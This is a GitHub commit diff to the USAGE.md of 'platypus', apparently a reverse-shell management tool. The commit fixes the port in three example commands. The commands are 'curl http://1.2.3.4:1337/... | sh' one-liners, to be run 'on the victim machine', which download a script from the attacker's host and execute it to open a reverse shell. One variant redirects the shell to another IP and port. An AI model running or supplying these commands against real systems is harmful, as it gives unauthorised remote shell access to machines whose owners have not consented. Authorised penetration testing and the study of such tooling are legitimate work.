Skip to content

Commit dd185c4

Browse files
authored
Update USAGE.md
1 parent 59d47f5 commit dd185c4

File tree

1 file changed

+3
-3
lines changed

1 file changed

+3
-3
lines changed

USAGE.md

+3-3
Original file line numberDiff line numberDiff line change
@@ -9,19 +9,19 @@ To archive this, all you need is to construct a URL that indicates the target.
99
### Quick start
1010

1111
1. Start platypus and listen to any port (eg: 1.2.3.4 1337)
12-
2. Execute `curl http://1.2.3.4 | sh` on the victim machine
12+
2. Execute `curl http://1.2.3.4:1337 | sh` on the victim machine
1313

1414
### Specifying language of reverse shell command (default: bash)
1515

1616
1. Start platypus and listen to any port (eg: 1.2.3.4 1337)
17-
2. Execute `curl http://1.2.3.4/python | sh` on the victim machine
17+
2. Execute `curl http://1.2.3.4:1337/python | sh` on the victim machine
1818

1919
### What if I want to pop up the reverse shell to another IP (5.6.7.8) and port (7331)?
2020

2121
By default, the new reverse shell will be popped up to the server which the port which the HTTP request sent, but you can simply change the IP and port by following these steps:
2222

2323
1. Start platypus and listen to any port (eg: 1.2.3.4 1337)
24-
2. Execute `curl http://1.2.3.4/5.6.7.8/7331/python | sh` on the victim machine
24+
2. Execute `curl http://1.2.3.4:1337/5.6.7.8/7331/python | sh` on the victim machine
2525

2626
### How to add a new language
2727

0 commit comments

Comments
 (0)